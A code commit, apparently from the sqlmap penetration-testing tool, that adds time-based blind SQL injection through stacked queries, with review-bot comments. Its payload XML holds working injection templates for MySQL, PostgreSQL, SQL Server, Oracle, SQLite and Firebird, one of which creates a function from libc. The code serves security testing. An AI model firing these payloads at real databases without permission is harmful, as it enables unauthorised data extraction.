

Commit f5ce739

committed
Added support for time-based blind SQL injection via stacked queries too. Vectors for some DBMSs still need to be added.
1 parent 10ef2b5 commit f5ce739

3 files changed

Lines changed: 87 additions & 35 deletions


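--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -413,8 +413,11 @@ def getValue(expression, blind=True, inband=True, error=True, time=True, fromUse
 value = __goInferenceProxy(expression, fromUser, expected, batch, resumeValue, unpack, charsetType, firstChar, lastChar)
 found = value or (value is None and expectingNone)
 
-if time and kb.timeTest and not found:
-kb.technique = PAYLOAD.TECHNIQUE.TIME
+if time and (kb.timeTest or kb.stackedTest) and not found:
+if kb.timeTest:
+kb.technique = PAYLOAD.TECHNIQUE.TIME
+elif kb.stackedTest:
+kb.technique = PAYLOAD.TECHNIQUE.STACKED
 
 while len(kb.responseTimes) < MIN_TIME_RESPONSES:
 _ = Request.queryPage(content=True)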
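Review bot: The `elif kb.stackedTest:` branch on the new side is redundant — the outer guard already requires `kb.timeTest or kb.stackedTest`, so once `kb.timeTest` is false the elif is always true; a plain `else:` states the intent and avoids a silent path where neither branch sets kb.technique should the guard be edited later. The precedence rule (TIME wins over STACKED when both tests succeeded) deserves a one-line comment, e.g. `# Prefer the plain time-based vector; use stacked-query timing only when no time-based injection was confirmed`. kb.technique is overwritten here before the timing calibration loop; whether it is restored if the delay-based attempt also fails cannot be seen from this hunk, since getValue continues past it.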

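--- a/lib/techniques/blind/inference.py
+++ b/lib/techniques/blind/inference.py
@@ -45,7 +45,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
 partialValue = ""
 finalValue = ""
 asciiTbl = getCharset(charsetType)
-timeBasedCompare = (kb.technique == PAYLOAD.TECHNIQUE.TIME)
+timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
 
 # Set kb.partRun in case "common prediction" feature (a.k.a. "good
 # samaritan") is used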
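Review bot: `timeBasedCompare` now treats every STACKED technique as a timing oracle, yet nothing on this line ties STACKED to a delay payload; the only assignment of `kb.technique = PAYLOAD.TECHNIQUE.STACKED` visible in this commit is the time-based branch in lib/request/inject.py, so if the STACKED technique is selected anywhere else (not visible here) bisection would judge responses by elapsed time rather than by content. A comment pinning that assumption would help, e.g. `# STACKED reaches bisection only via the time-blind path in getValue(), so it is judged by response delay like TIME`; a dedicated boolean set next to kb.technique would make the coupling explicit instead of implicit. bisection's body continues outside the hunk.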

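--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -161,7 +161,7 @@ Tag: <test>
 SQL injections.
 
 Sub-tag: <out-of-band>
-#TODO
+# TODO
 
 Sub-tag: <details>
 Which details can be infered if the payload succeed.
@@ -172,7 +172,7 @@ Tag: <test>
 Sub-tags: <dbms_version>
 What is the database management system version (e.g. 5.0.51).
 
-Sub-tags: <os>
+Sub-tags: <os>
 What is the database management system underlying operating
 system.
 
@@ -1206,6 +1206,7 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
+<vector>; IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM]);</vector>
 <request>
 <payload>; SELECT SLEEP([SLEEPTIME]);</payload>
 <comment>#</comment>
@@ -1226,6 +1227,7 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
+<vector>; IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM]);</vector>
 <request>
 <payload>; SELECT BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'));</payload>
 <comment>#</comment>
@@ -1245,6 +1247,7 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
+<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END);</vector>
 <request>
 <payload>; SELECT PG_SLEEP([SLEEPTIME]);</payload>
 <comment>--</comment>
@@ -1259,22 +1262,22 @@ Formats:
 </test>
 
 <test>
-<title>PostgreSQL &lt; 8.2 stacked queries (heavy query)</title>
+<title>PostgreSQL stacked queries (heavy query)</title>
 <stype>4</stype>
-<level>3</level>
+<level>2</level>
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
+<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END);</vector>
 <request>
-<payload>; SELECT [RANDNUM] WHERE EXISTS(SELECT * FROM GENERATE_SERIES(1, [SLEEPTIME]000000));</payload>
+<payload>; SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000);</payload>
 <comment>--</comment>
 </request>
 <response>
 <time>[DELAYED]</time>
 </response>
 <details>
 <dbms>PostgreSQL</dbms>
-<dbms_version>&lt; 8.2</dbms_version>
 </details>
 </test>
 
@@ -1285,8 +1288,9 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
+<vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END);</vector>
 <request>
-<payload>; CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]);</payload>
+<payload>; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6', 'sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME]);</payload>
 <comment>--</comment>
 </request>
 <response>
@@ -1306,6 +1310,7 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
+<vector></vector>
 <request>
 <payload>; WAITFOR DELAY '0:0:[SLEEPTIME]';</payload>
 <comment>--</comment>
@@ -1325,6 +1330,7 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
+<vector></vector>
 <request>
 <payload>; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END;</payload>
 <comment>--</comment>
@@ -1344,6 +1350,7 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
+<vector></vector>
 <request>
 <payload>; EXEC DBMS_LOCK.SLEEP([SLEEPTIME].00);</payload>
 <comment>--</comment>
@@ -1363,6 +1370,7 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
+<vector></vector>
 <request>
 <payload>; EXEC USER_LOCK.SLEEP([SLEEPTIME].00);</payload>
 <comment>--</comment>
@@ -1382,6 +1390,7 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
+<vector></vector>
 <request>
 <payload>; SELECT LIKE('ABCDEFG', UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))));</payload>
 <comment>--</comment>
@@ -1402,8 +1411,9 @@ Formats:
 <risk>0</risk>
 <clause>0</clause>
 <where>1</where>
+<vector></vector>
 <request>
-<payload>; SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6;</payload>
+<payload>; SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6;</payload>
 <comment>--</comment>
 </request>
 <response>
@@ -1448,7 +1458,7 @@ Formats:
 <where>1</where>
 <vector>AND [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM])</vector>
 <request>
-<payload>AND BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</payload>
+<payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</payload>
 </request>
 <response>
 <time>[DELAYED]</time>
@@ -1458,16 +1468,36 @@ Formats:
 </details>
 </test>
 
+<test>
+<title>PostgreSQL &gt; 8.1 AND time-based blind</title>
+<stype>5</stype>
+<level>2</level>
+<risk>1</risk>
+<clause>1,2,3</clause>
+<where>1</where>
+<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+<request>
+<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
+</request>
+<response>
+<time>[SLEEPTIME]</time>
+</response>
+<details>
+<dbms>PostgreSQL</dbms>
+<dbms_version>&gt; 8.1</dbms_version>
+</details>
+</test>
+
 <test>
 <title>PostgreSQL AND time-based blind (heavy query)</title>
 <stype>5</stype>
-<level>1</level>
+<level>3</level>
 <risk>1</risk>
 <clause>1,2,3</clause>
 <where>1</where>
-<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
 <request>
-<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000))</payload>
+<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000))</payload>
 </request>
 <response>
 <time>[DELAYED]</time>
@@ -1484,9 +1514,9 @@ Formats:
 <risk>1</risk>
 <clause>1,2,3</clause>
 <where>1</where>
-<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)</vector>
+<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)</vector>
 <request>
-<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)</payload>
+<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)</payload>
 </request>
 <response>
 <time>[DELAYED]</time>
@@ -1522,9 +1552,9 @@ Formats:
 <risk>1</risk>
 <clause>1,2,3</clause>
 <where>1</where>
-<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
+<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
 <request>
-<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
+<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
 </request>
 <response>
 <time>[DELAYED]</time>
@@ -1561,9 +1591,9 @@ Formats:
 <risk>1</risk>
 <clause>1</clause>
 <where>1</where>
-<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM])</vector>
+<vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM])</vector>
 <request>
-<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6)</payload>
+<payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6)</payload>
 </request>
 <response>
 <time>[DELAYED]</time>
@@ -1585,10 +1615,9 @@ Formats:
 <risk>3</risk>
 <clause>1,2,3</clause>
 <where>2</where>
-<!-- NOTE: =0 needs to stay or else MySQL goes nunners -->
-<vector>OR IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM])=0</vector>
+<vector>OR [RANDNUM]=IF(([INFERENCE]), SLEEP([SLEEPTIME]), [RANDNUM])</vector>
 <request>
-<payload>OR SLEEP([SLEEPTIME])=0</payload>
+<payload>OR [RANDNUM]=SLEEP([SLEEPTIME])</payload>
 </request>
 <response>
 <time>[SLEEPTIME]</time>
@@ -1602,13 +1631,13 @@ Formats:
 <test>
 <title>MySQL &lt; 5.0.12 OR time-based blind (heavy query)</title>
 <stype>5</stype>
-<level>3</level>
+<level>4</level>
 <risk>3</risk>
 <clause>1,2,3</clause>
 <where>2</where>
 <vector>OR [RANDNUM]=IF(([INFERENCE]), BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]')), [RANDNUM])</vector>
 <request>
-<payload>OR BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</payload>
+<payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000, MD5('[SLEEPTIME]'))</payload>
 </request>
 <response>
 <time>[DELAYED]</time>
@@ -1619,15 +1648,35 @@ Formats:
 </test>
 
 <test>
-<title>PostgreSQL OR time-based blind (heavy query)</title>
+<title>PostgreSQL &gt; 8.1 OR time-based blind</title>
 <stype>5</stype>
 <level>3</level>
 <risk>3</risk>
 <clause>1,2,3</clause>
 <where>2</where>
-<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
+<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
+<request>
+<payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
+</request>
+<response>
+<time>[SLEEPTIME]</time>
+</response>
+<details>
+<dbms>PostgreSQL</dbms>
+<dbms_version>&gt; 8.1</dbms_version>
+</details>
+</test>
+
+<test>
+<title>PostgreSQL OR time-based blind (heavy query)</title>
+<stype>5</stype>
+<level>4</level>
+<risk>3</risk>
+<clause>1,2,3</clause>
+<where>2</where>
+<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
 <request>
-<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1, [SLEEPTIME]000000))</payload>
+<payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM GENERATE_SERIES(1, [SLEEPTIME]000000))</payload>
 </request>
 <response>
 <time>[DELAYED]</time>
@@ -1644,9 +1693,9 @@ Formats:
 <risk>3</risk>
 <clause>1,2,3</clause>
 <where>2</where>
-<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)</vector>
+<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7) ELSE [RANDNUM] END)</vector>
 <request>
-<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)</payload>
+<payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5, sysusers AS sys6, sysusers AS sys7)</payload>
 </request>
 <response>
 <time>[DELAYED]</time>
@@ -1682,9 +1731,9 @@ Formats:
 <risk>4</risk>
 <clause>1,2,3</clause>
 <where>2</where>
-<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
+<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
 <request>
-<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
+<payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
 </request>
 <response>
 <time>[DELAYED]</time>
@@ -1721,9 +1770,9 @@ Formats:
 <risk>3</risk>
 <clause>1</clause>
 <where>2</where>
-<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM])</vector>
+<vector>OR [RANDNUM]=IIF(([INFERENCE]),(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6),[RANDNUM])</vector>
 <request>
-<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6)</payload>
+<payload>OR [RANDNUM]=(SELECT [RANDNUM] FROM RDB$DATABASE AS T1, RDB$FIELDS AS T2, RDB$FUNCTIONS AS T3, RDB$TYPES AS T4, RDB$FORMATS AS T5, RDB$COLLATIONS AS T6)</payload>
 </request>
 <response>
 <time>[DELAYED]</time>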
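Review bot: Six of the stacked-query tests (new lines 1313, 1333, 1353, 1373, 1393 and 1414 — the Microsoft SQL Server, Oracle, SQLite and Firebird entries) now carry an empty `<vector></vector>`, while the lib/request/inject.py change in this same commit enters the STACKED inference branch whenever `kb.stackedTest` is set; unless the payload loader skips tests whose vector is empty (not visible here), inference against those DBMSs would likely run with no usable payload and misreport every character. Marking the gap in the file rather than only in the commit message, e.g. `<!-- TODO: inference vector not yet available for this DBMS -->` beside each empty element, or omitting the element until it is filled, keeps it visible to whoever next edits the XML. The `<time>` expectation also differs between the new PG_SLEEP tests (`[SLEEPTIME]`) and the heavy-query ones (`[DELAYED]`), which is presumably intentional but is not explained anywhere in the hunks.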
